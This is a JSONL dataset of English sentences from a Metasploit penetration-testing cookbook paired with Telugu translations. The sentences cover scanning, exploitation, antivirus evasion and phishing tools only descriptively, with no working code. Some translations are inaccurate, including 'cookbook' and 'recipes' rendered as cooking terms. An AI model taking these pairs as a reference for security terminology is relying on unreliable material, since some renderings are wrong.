Cyber-Parallel-Dataset-Indic / te /Metasploit Penetration Testing Cookbook 3rd Edi_indic_translation.jsonl
mantri511's picture
Upload 550 files
2279b8e verified
{"en":"Metasploit is a powerful framework for penetration testing.","translation":"మెటాస్ప్లోయిట్ చొరబాటు పరీక్ష కోసం ఒక శక్తివంతమైన ఫ్రేమ్‌వర్క్.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"This book teaches how to use Metasploit to exploit vulnerabilities.","translation":"ఈ పుస్తకం మెటాస్ప్లోయిట్‌ను ఉపయోగించి బలహీనతలను ఎలా ఉపయోగించాలో నేర్పుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Install Metasploit on your Kali Linux system.","translation":"మీ కాలీ లైనక్స్ సిస్టమ్‌లో మెటాస్ప్లోయిట్‌ను ఇన్‌స్టాల్ చేయండి.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"The book covers various penetration testing techniques.","translation":"ఈ పుస్తకం వివిధ చొరబాటు పరీక్ష పద్ధతులను వివరిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Understanding the basics of Metasploit is crucial.","translation":"మెటాస్ప్లోయిట్ యొక్క ప్రాథమికాలను అర్థం చేసుకోవడం చాలా ముఖ్యం.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Use MSFvenom to generate payloads.","translation":"పేలోడ్‌లను రూపొందించడానికి MSFvenom ని ఉపయోగించండి.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Exploiting a system requires careful planning.","translation":"ఒక వ్యవస్థను ఉపయోగించుకోవడానికి జాగ్రత్తగా ప్రణాళిక అవసరం.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"This chapter discusses server-side exploitation.","translation":"ఈ అధ్యాయం సర్వర్-సైడ్ దోపిడీని చర్చిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Meterpreter is a powerful post-exploitation tool.","translation":"మీటర్ప్రెటర్ ఒక శక్తివంతమైన పోస్ట్-ఎక్స్‌ప్లోయిటేషన్ సాధనం.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Learn how to bypass antivirus software.","translation":"యాంటీవైరస్ సాఫ్ట్‌వేర్‌ను ఎలా దాటవేయాలో తెలుసుకోండి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The Social-Engineer Toolkit is useful for phishing.","translation":"సామాజిక-ఇంజనీర్ టూల్‌కిట్ ఫిషింగ్ కోసం ఉపయోగపడుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Building your own modules can enhance your skills.","translation":"మీ స్వంత మాడ్యూల్స్‌ను నిర్మించడం మీ నైపుణ్యాలను మెరుగుపరుస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Wireless network penetration testing is also covered.","translation":"వైర్‌లెస్ నెట్‌వర్క్ చొరబాటు పరీక్ష కూడా ఇందులో ఉంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Cloud penetration testing is a growing field.","translation":"క్లౌడ్ చొరబాటు పరీక్ష ఒక అభివృద్ధి చెందుతున్న రంగం.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Always follow ethical guidelines during testing.","translation":"పరీక్ష సమయంలో ఎల్లప్పుడూ నైతిక మార్గదర్శకాలను అనుసరించండి.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"This book is a valuable resource for security professionals.","translation":"ఈ పుస్తకం భద్రతా నిపుణులకు విలువైన వనరు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The Metasploit framework is constantly updated.","translation":"మెటాస్ప్లోయిట్ ఫ్రేమ్‌వర్క్ నిరంతరం నవీకరించబడుతుంది.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Understanding exploits is key to penetration testing.","translation":"చొరబాటు పరీక్షకు దోపిడీలను అర్థం చేసుకోవడం చాలా ముఖ్యం.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Practice makes perfect in the world of cybersecurity.","translation":"సైబర్ భద్రతా ప్రపంచంలో అభ్యాసం పరిపూర్ణతను ఇస్తుంది.","target_lang":"te","domain":"general","complexity":"moderate"}
{"en":"This cookbook provides practical examples and recipes.","translation":"ఈ వంటల పుస్తకం ఆచరణాత్మక ఉదాహరణలు మరియు వంటకాలను అందిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Metasploit is a leading penetration-testing tool.","translation":"మెటాస్ప్లోయిట్ ఒక ప్రముఖ చొరబాటు పరీక్ష సాధనం.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Install Metasploit on macOS using the provided installer package.","translation":"అందించిన ఇన్స్టాలర్ ప్యాకేజీని ఉపయోగించి macOSలో మెటాస్ప్లోయిట్‌ను ఇన్స్టాల్ చేయండి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Kali Linux comes with Metasploit preinstalled.","translation":"కాలి లినక్స్ మెటాస్ప్లోయిట్‌తో ముందే ఇన్స్టాల్ చేయబడి వస్తుంది.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"The Metasploit framework has a modular architecture.","translation":"మెటాస్ప్లోయిట్ ఫ్రేమ్‌వర్క్ ఒక మాడ్యులర్ ఆర్కిటెక్చర్‌ను కలిగి ఉంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Exploits, payloads, and encoders are separate modules.","translation":"ఎక్స్‌ప్లోయిట్‌లు, పేలోడ్‌లు మరియు ఎన్‌కోడర్‌లు ప్రత్యేక మాడ్యూల్స్.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The msfconsole interface is a flexible tool.","translation":"msfconsole ఇంటర్‌ఫేస్ ఒక సౌకర్యవంతమైన సాధనం.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"You can launch exploits using msfconsole.","translation":"మీరు msfconsoleని ఉపయోగించి ఎక్స్‌ప్లోయిట్‌లను ప్రారంభించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The web interface is available for Metasploit Pro.","translation":"మెటాస్ప్లోయిట్ ప్రో కోసం వెబ్ ఇంటర్‌ఫేస్ అందుబాటులో ఉంది.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Download the Metasploit framework installer from the official website.","translation":"అధికారిక వెబ్‌సైట్ నుండి మెటాస్ప్లోయిట్ ఫ్రేమ్‌వర్క్ ఇన్స్టాలర్‌ను డౌన్‌లోడ్ చేయండి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Disable antivirus during Metasploit installation.","translation":"మెటాస్ప్లోయిట్ ఇన్‌స్టాలేషన్ సమయంలో యాంటీవైరస్‌ను నిలిపివేయండి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The quick installation script imports the Rapid7 signing key.","translation":"త్వరిత ఇన్‌స్టాలేషన్ స్క్రిప్ట్ రాపిడ్7 సంతకం కీని దిగుమతి చేస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Use msfconsole to start the Metasploit Framework.","translation":"మెటాస్ప్లోయిట్ ఫ్రేమ్‌వర్క్‌ను ప్రారంభించడానికి msfconsoleని ఉపయోగించండి.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Kali Linux is popular among security professionals.","translation":"కాలి లినక్స్ భద్రతా నిపుణులలో ప్రసిద్ధి చెందింది.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Set up a Metasploit development environment on Kali Linux.","translation":"కాలి లినక్స్‌లో మెటాస్ప్లోయిట్ అభివృద్ధి వాతావరణాన్ని ఏర్పాటు చేయండి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The default username for Kali Linux is root.","translation":"కాలి లినక్స్ కోసం డిఫాల్ట్ యూజర్ పేరు రూట్.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Create a penetration-testing lab for practice.","translation":"అభ్యాసం కోసం చొరబాటు పరీక్షా ప్రయోగశాలను సృష్టించండి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Virtual machines provide flexibility for your lab.","translation":"వర్చువల్ మెషీన్‌లు మీ ప్రయోగశాల కోసం సౌలభ్యాన్ని అందిస్తాయి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Configure the network adapter in VMware.","translation":"VMwareలో నెట్‌వర్క్ అడాప్టర్‌ను కాన్ఫిగర్ చేయండి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"SSH allows secure remote access.","translation":"SSH సురక్షిత రిమోట్ యాక్సెస్‌ను అనుమతిస్తుంది.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Use the `passwd` command to change the root password.","translation":"రూట్ పాస్‌వర్డ్‌ను మార్చడానికి `passwd` ఆదేశాన్ని ఉపయోగించండి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Nmap is the most powerful and preferred scanner for security professionals.","translation":"Nmap అనేది భద్రతా నిపుణుల కోసం అత్యంత శక్తివంతమైన మరియు ప్రాధాన్యత కలిగిన స్కానర్.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The usage of Nmap varies from novice to an advanced level.","translation":"Nmap వినియోగం అనుభవశూన్యుడు నుండి అధునాతన స్థాయి వరకు మారుతుంది.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"We will analyze the various scan techniques in detail.","translation":"మేము వివిధ స్కాన్ పద్ధతులను వివరంగా విశ్లేషిస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Getting ready You run Nmap directly from msfconsole.","translation":"సిద్ధం అవ్వండి మీరు నేరుగా msfconsole నుండి Nmapని అమలు చేస్తారు.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"However, if you want to import the results into the Metasploit database, you need to run the Nmap scan using the -oX flag.","translation":"అయితే, మీరు ఫలితాలను మెటాస్ప్లోయిట్ డేటాబేస్‌లోకి దిగుమతి చేయాలనుకుంటే, మీరు -oX ఫ్లాగ్ ఉపయోగించి Nmap స్కాన్‌ను అమలు చేయాలి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The TCP connect scan is the most basic and default scan type in Nmap.","translation":"TCP కనెక్ట్ స్కాన్ అనేది Nmapలో అత్యంత ప్రాథమికమైన మరియు డిఫాల్ట్ స్కాన్ రకం.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"It follows the three-way handshake process to detect the open ports on the target machine.","translation":"ఇది లక్ష్య యంత్రంలో తెరిచిన పోర్ట్‌లను గుర్తించడానికి మూడు-మార్గం హ్యాండ్‌షేక్ ప్రక్రియను అనుసరిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Let's perform this scan on one of our targets.","translation":"మన లక్ష్యాలలో ఒకదానిపై ఈ స్కాన్‌ను చేద్దాం.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"The SYN scan is considered a stealth scanning technique.","translation":"SYN స్కాన్ ఒక రహస్య స్కానింగ్ పద్ధతిగా పరిగణించబడుతుంది.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"It never forms a complete connection between the target and the scanner.","translation":"ఇది లక్ష్యం మరియు స్కానర్ మధ్య పూర్తి కనెక్షన్‌ను ఎప్పుడూ ఏర్పరచదు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The –sS parameter will instruct Nmap to perform a SYN scan on the target machine.","translation":"–sS పరామితి లక్ష్య యంత్రంలో SYN స్కాన్‌ను నిర్వహించమని Nmapకి సూచిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The output of both TCP connect and the SYN scan are similar in most of the cases.","translation":"TCP కనెక్ట్ మరియు SYN స్కాన్ రెండింటి ఫలితాలు చాలా సందర్భాల్లో ఒకే విధంగా ఉంటాయి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The –p parameter shows the range of port numbers that we want to scan.","translation":"–p పరామితి మనం స్కాన్ చేయాలనుకుంటున్న పోర్ట్ నంబర్‌ల శ్రేణిని చూపుతుంది.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"The UDP scan is the scanning technique to identify open UDP ports on the target.","translation":"UDP స్కాన్ అనేది లక్ష్యంపై తెరిచిన UDP పోర్ట్‌లను గుర్తించే స్కానింగ్ పద్ధతి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"During a penetration test, the scanning process can provide lots of useful results.","translation":"పెనెట్రేషన్ పరీక్ష సమయంలో, స్కానింగ్ ప్రక్రియ చాలా ఉపయోగకరమైన ఫలితాలను అందించగలదు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The TCP connect scan is the most basic scanning technique in which a full connection is established.","translation":"TCP కనెక్ట్ స్కాన్ అనేది అత్యంత ప్రాథమిక స్కానింగ్ పద్ధతి, దీనిలో పూర్తి కనెక్షన్ ఏర్పడుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"A SYN scan is another type of TCP scan, but it never forms a complete connection with the target.","translation":"SYN స్కాన్ అనేది మరొక రకం TCP స్కాన్, కానీ ఇది లక్ష్యంతో పూర్తి కనెక్షన్‌ను ఎప్పుడూ ఏర్పరచదు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"UDP scanning is a connectionless scanning technique.","translation":"UDP స్కానింగ్ అనేది కనెక్షన్ లేని స్కానింగ్ పద్ధతి.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"There are some advanced options provided by Nmap, apart from port scanning.","translation":"పోర్ట్ స్కానింగ్‌తో పాటు, Nmap అందించే కొన్ని అధునాతన ఎంపికలు ఉన్నాయి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"This can ease our task of finding the right exploits.","translation":"ఇది సరైన ఎక్స్‌ప్లాయిట్‌లను కనుగొనే పనిని సులభతరం చేస్తుంది.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"To add a new workspace, use the -a option followed by the name of the workspace.","translation":"కొత్త వర్క్‌స్పేస్‌ను జోడించడానికి, -a ఎంపికను ఉపయోగించండి, ఆ తర్వాత వర్క్‌స్పేస్ పేరును ఉపయోగించండి.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"The default workspace is selected when connecting to the database.","translation":"డేటాబేస్‌కు కనెక్ట్ అయినప్పుడు డిఫాల్ట్ వర్క్‌స్పేస్ ఎంచుకోబడుతుంది.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"To list the available workspaces, simply type the workspace command.","translation":"అందుబాటులో ఉన్న వర్క్‌స్పేస్‌లను జాబితా చేయడానికి, వర్క్‌స్పేస్ కమాండ్‌ను టైప్ చేయండి.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"To delete a workspace, use the -d option followed by the name of the workspace.","translation":"వర్క్‌స్పేస్‌ను తొలగించడానికి, -d ఎంపికను ఉపయోగించండి, ఆ తర్వాత వర్క్‌స్పేస్ పేరును ఉపయోగించండి.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"To change the current workspace, use the workspace command followed by the name of the workspace you want to change to.","translation":"ప్రస్తుత వర్క్‌స్పేస్‌ను మార్చడానికి, మీరు మార్చాలనుకుంటున్న వర్క్‌స్పేస్ పేరుతో పాటు వర్క్‌స్పేస్ కమాండ్‌ను ఉపయోగించండి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Once the database is configured, we can start using it.","translation":"డేటాబేస్ కాన్ఫిగర్ అయిన తర్వాత, మనం దాన్ని ఉపయోగించడం ప్రారంభించవచ్చు.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"To test the db_import command, we will use the nmap command.","translation":"db_import కమాండ్‌ను పరీక్షించడానికి, మేము nmap కమాండ్‌ను ఉపయోగిస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Alternatively, you can run the db_nmap command directly from msfconsole.","translation":"ప్రత్యామ్నాయంగా, మీరు db_nmap కమాండ్‌ను నేరుగా msfconsole నుండి అమలు చేయవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Now that we have data in the database, we can start by using the hosts command.","translation":"డేటాబేస్‌లో డేటా ఉన్నందున, మేము హోస్ట్‌ల కమాండ్‌ను ఉపయోగించడం ద్వారా ప్రారంభించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Using the -c option, we can select which columns to display.","translation":"-c ఎంపికను ఉపయోగించి, ఏ కాలమ్‌లను ప్రదర్శించాలో మనం ఎంచుకోవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"With the -S option, we can search for specific strings, such as the OS name.","translation":"-S ఎంపికతో, OS పేరు వంటి నిర్దిష్ట స్ట్రింగ్‌ల కోసం మనం శోధించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The services command allows us to display the services running on the hosts.","translation":"హోస్ట్‌లలో నడుస్తున్న సేవలని ప్రదర్శించడానికి సేవల కమాండ్ మనకు అనుమతిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Using the search command without any options displays all the available services.","translation":"ఎటువంటి ఎంపికలు లేకుండా శోధన కమాండ్‌ను ఉపయోగించడం వలన అందుబాటులో ఉన్న అన్ని సేవలు ప్రదర్శించబడతాయి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"By combining multiple options, you can search just a specific host and only display the columns you want.","translation":"బహుళ ఎంపికలను కలపడం ద్వారా, మీరు నిర్దిష్ట హోస్ట్ కోసం శోధించవచ్చు మరియు మీకు కావలసిన కాలమ్‌లను మాత్రమే ప్రదర్శించవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Information gathering is the first and one of the most, if not the most, important activities in penetration testing.","translation":"పెనెట్రేషన్ టెస్టింగ్‌లో సమాచార సేకరణ అనేది మొదటిది మరియు చాలా ముఖ్యమైన కార్యకలాపాలలో ఒకటి.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"This step is carried out in order to find out as much information about the target machine as possible.","translation":"లక్ష్య యంత్రం గురించి వీలైనంత ఎక్కువ సమాచారం తెలుసుకోవడానికి ఈ దశ నిర్వహించబడుతుంది.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"During the information gathering phase, our main focus is to collect facts about the target machine, such as the IP address, available services, and open ports.","translation":"సమాచార సేకరణ దశలో, IP చిరునామా, అందుబాటులో ఉన్న సేవలు మరియు తెరిచిన పోర్ట్‌లు వంటి లక్ష్య యంత్రం గురించి వాస్తవాలను సేకరించడంపై మా ప్రధాన దృష్టి ఉంటుంది.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"This information plays a vital role in the process of penetration testing.","translation":"ఈ సమాచారం పెనెట్రేషన్ టెస్టింగ్ ప్రక్రియలో కీలక పాత్ర పోషిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Passive information gathering: This technique is used to gain information about the target, without having any physical connectivity or access to it.","translation":"నిష్క్రియ సమాచార సేకరణ: ఈ పద్ధతి లక్ష్యం గురించి సమాచారాన్ని పొందడానికి ఉపయోగించబడుతుంది, దానితో ఎటువంటి భౌతిక కనెక్టివిటీ లేదా యాక్సెస్ లేకుండా.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Active information gathering: In this technique, a logical connection is set up with the target in order to gain information.","translation":"చురుకైన సమాచార సేకరణ: ఈ పద్ధతిలో, సమాచారాన్ని పొందడానికి లక్ష్యంతో తార్కిక కనెక్షన్ ఏర్పాటు చేయబడుతుంది.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"The scan results, as with the previous auxiliary modules, will get stored in the Metasploit database.","translation":"మునుపటి సహాయక మాడ్యూల్స్‌తో పాటు, స్కాన్ ఫలితాలు మెటాస్ప్లోయిట్ డేటాబేస్‌లో నిల్వ చేయబడతాయి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The SMTP User Enumeration Utility auxiliary module, through the implementation of these SMTP commands, can reveal a list of valid users.","translation":"SMTP యూజర్ ఎన్యూమరేషన్ యుటిలిటీ సహాయక మాడ్యూల్, ఈ SMTP ఆదేశాలను అమలు చేయడం ద్వారా, చెల్లుబాటు అయ్యే వినియోగదారుల జాబితాను వెల్లడిస్తుంది.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"To run the module, set the target address range, the number of concurrent threads, and type run.","translation":"మాడ్యూల్‌ను అమలు చేయడానికి, లక్ష్య చిరునామా పరిధిని, ఏకకాల థ్రెడ్‌ల సంఖ్యను సెట్ చేసి, రన్ అని టైప్ చేయండి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The output reveals a list of valid users for the Metasploitable 2 target.","translation":"అవుట్‌పుట్ మెటాస్ప్లోయిటబుల్ 2 లక్ష్యం కోసం చెల్లుబాటు అయ్యే వినియోగదారుల జాబితాను వెల్లడిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"SNMP sweeps are often a good indicator in finding a lot of information about a specific system.","translation":"SNMP స్వీప్‌లు తరచుగా ఒక నిర్దిష్ట వ్యవస్థ గురించి చాలా సమాచారాన్ని కనుగొనడానికి మంచి సూచికగా ఉంటాయి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Metasploit has a built-in auxiliary module specifically for sweeping SNMP devices.","translation":"మెటాస్ప్లోయిట్ SNMP పరికరాలను స్వీప్ చేయడానికి ప్రత్యేకంగా అంతర్నిర్మిత సహాయక మాడ్యూల్‌ను కలిగి ఉంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"If dealing with Windows-based devices configured with SNMP, often at times with the RO/RW community strings, we can extract patch levels.","translation":"SNMPతో కాన్ఫిగర్ చేయబడిన విండోస్ ఆధారిత పరికరాలతో వ్యవహరించేటప్పుడు, తరచుగా RO/RW కమ్యూనిటీ స్ట్రింగ్‌లతో, మేము ప్యాచ్ స్థాయిలను సంగ్రహించవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"The Management Information Base (MIB) interface allows us to query the device and extract information.","translation":"మేనేజ్‌మెంట్ ఇన్ఫర్మేషన్ బేస్ (MIB) ఇంటర్‌ఫేస్ పరికరాన్ని ప్రశ్నించడానికి మరియు సమాచారాన్ని సంగ్రహించడానికి అనుమతిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The HTTP Robots.txt Content Scanner auxiliary module will search for robots.txt files and analyze their content.","translation":"HTTP Robots.txt కంటెంట్ స్కానర్ సహాయక మాడ్యూల్ robots.txt ఫైల్‌ల కోసం శోధిస్తుంది మరియు వాటి కంటెంట్‌ను విశ్లేషిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"If the PUT method can be used by any unauthenticated remote user, arbitrary web pages can be inserted.","translation":"ఏదైనా ప్రమాణీకరించని రిమోట్ వినియోగదారు ద్వారా PUT పద్ధతిని ఉపయోగించగలిగితే, ఇష్టానుసారం వెబ్ పేజీలను చొప్పించవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"To run the HTTP SSL Certificate Checker auxiliary module, we need to specify the target host and the target port.","translation":"HTTP SSL సర్టిఫికేట్ చెకర్ సహాయక మాడ్యూల్‌ను అమలు చేయడానికి, మనం లక్ష్య హోస్ట్ మరియు లక్ష్య పోర్ట్‌ను పేర్కొనాలి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The WinRM Authentication Method Detection auxiliary module sends a request to an HTTP/HTTPS service.","translation":"WinRM ప్రమాణీకరణ పద్ధతి గుర్తింపు సహాయక మాడ్యూల్ HTTP/HTTPS సేవకు అభ్యర్థనను పంపుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"If it is a WinRM service, it also gathers the authentication methods supported.","translation":"ఇది WinRM సేవ అయితే, ఇది మద్దతు ఇచ్చే ప్రమాణీకరణ పద్ధతులను కూడా సేకరిస్తుంది.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"To use the WinRM Authentication Method Detection auxiliary module, set the target address range in RHOSTS and type run.","translation":"WinRM ప్రమాణీకరణ పద్ధతి గుర్తింపు సహాయక మాడ్యూల్‌ను ఉపయోగించడానికి, RHOSTSలో లక్ష్య చిరునామా పరిధిని సెట్ చేసి, రన్ అని టైప్ చేయండి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"To run the WinRM Command Runner auxiliary module, we need to set the targets IP address, the Windows command to run, the username Administrator, and password vagrant.","translation":"WinRM కమాండ్ రన్నర్ సహాయక మాడ్యూల్‌ను అమలు చేయడానికి, మనం లక్ష్యాల IP చిరునామా, అమలు చేయవలసిన Windows కమాండ్, వినియోగదారు పేరు నిర్వాహకుడు మరియు పాస్‌వర్డ్ vagrantని సెట్ చేయాలి.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Nessus is one of the most widely used vulnerability scanners.","translation":"Nessus అత్యంత విస్తృతంగా ఉపయోగించే బలహీనత స్కానర్‌లలో ఒకటి.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"To use Nessus for the first time, you will have to register and get a registration code from the Nessus website.","translation":"మొదటిసారి Nessusని ఉపయోగించడానికి, మీరు నమోదు చేసుకోవాలి మరియు Nessus వెబ్‌సైట్ నుండి రిజిస్ట్రేషన్ కోడ్‌ను పొందాలి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"You can download it at https:/​/​www.​tenable.​com/​products/​nessus-​home.","translation":"మీరు దీన్ని https:/​/​www.​tenable.​com/​products/​nessus-​home వద్ద డౌన్‌లోడ్ చేసుకోవచ్చు.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"To start working with Nessus in msfconsole, we will have to load Nessus and then connect it with the server.","translation":"msfconsoleలో Nessusతో పని చేయడం ప్రారంభించడానికి, మనం Nessusని లోడ్ చేసి, ఆపై సర్వర్‌తో కనెక్ట్ చేయాలి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"By running the nessus_help command, we can display all the available commands.","translation":"nessus_help కమాండ్ రన్ చేయడం ద్వారా, మనం అందుబాటులో ఉన్న అన్ని కమాండ్‌లను ప్రదర్శించవచ్చు.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Unpatched systems are a safe haven for hackers.","translation":"ప్యాచ్ చేయని సిస్టమ్‌లు హ్యాకర్లకు సురక్షితమైన ఆశ్రయం.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Regularly patching and updating the operating system is essential.","translation":"ఆపరేటింగ్ సిస్టమ్‌ను క్రమం తప్పకుండా ప్యాచ్ చేయడం మరియు అప్‌డేట్ చేయడం చాలా అవసరం.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"In this chapter, we will focus on vulnerabilities that are reported in some of the most popular services and operating systems.","translation":"ఈ అధ్యాయంలో, అత్యంత ప్రజాదరణ పొందిన కొన్ని సర్వీస్‌లు మరియు ఆపరేటింగ్ సిస్టమ్‌లలో నివేదించబడిన బలహీనతలపై మేము దృష్టి పెడతాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Pentesters start looking for available exploits for the particular service or operating system flaws.","translation":"పెనెట్రేషన్ పరీక్షకులు నిర్దిష్ట సర్వీస్ లేదా ఆపరేటింగ్ సిస్టమ్ లోపాలకు అందుబాటులో ఉన్న ఎక్స్‌ప్లాయిట్‌ల కోసం వెతకడం ప్రారంభిస్తారు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"We will focus on some of the most widely used operating systems of Microsoft, and some flavors of Linux.","translation":"మేము మైక్రోసాఫ్ట్ యొక్క అత్యంత విస్తృతంగా ఉపయోగించే కొన్ని ఆపరేటింగ్ సిస్టమ్‌లు మరియు లైనక్స్ యొక్క కొన్ని రుచులపై దృష్టి పెడతాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"We will also look at how to use exploits and set up their parameters to make them executable on the target machine.","translation":"ఎక్స్‌ప్లాయిట్‌లను ఎలా ఉపయోగించాలో మరియు వాటి పారామితులను లక్ష్య యంత్రంలో అమలు చేయడానికి ఎలా సెట్ చేయాలో కూడా మేము చూస్తాము.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Let's move further on with the various recipes.","translation":"వివిధ వంటకాలతో ముందుకు వెళ్దాం.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"It is essential to understand the usage of exploits so that you can overcome some common errors.","translation":"కొన్ని సాధారణ లోపాలను అధిగమించడానికి ఎక్స్‌ప్లాయిట్‌ల వినియోగాన్ని అర్థం చేసుకోవడం చాలా అవసరం.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"In order to start using exploits on your target, the first thing required is to scan the target for open ports and services.","translation":"మీ లక్ష్యంపై ఎక్స్‌ప్లాయిట్‌లను ఉపయోగించడం ప్రారంభించడానికి, మొదట అవసరమైనది ఓపెన్ పోర్ట్‌లు మరియు సర్వీస్‌ల కోసం లక్ష్యాన్ని స్కాన్ చేయడం.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Once you have gathered enough information about the target, the next step is to select exploits accordingly.","translation":"మీరు లక్ష్యం గురించి తగినంత సమాచారాన్ని సేకరించిన తర్వాత, తదుపరి దశ తదనుగుణంగా ఎక్స్‌ప్లాయిట్‌లను ఎంచుకోవడం.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"MSFconsole is the most popular interface for the Metasploit Framework.","translation":"MSFconsole అనేది మెటాస్ప్లాయిట్ ఫ్రేమ్‌వర్క్ కోసం అత్యంత ప్రజాదరణ పొందిన ఇంటర్‌ఫేస్.","target_lang":"te","domain":"technical","complexity":"simple"}
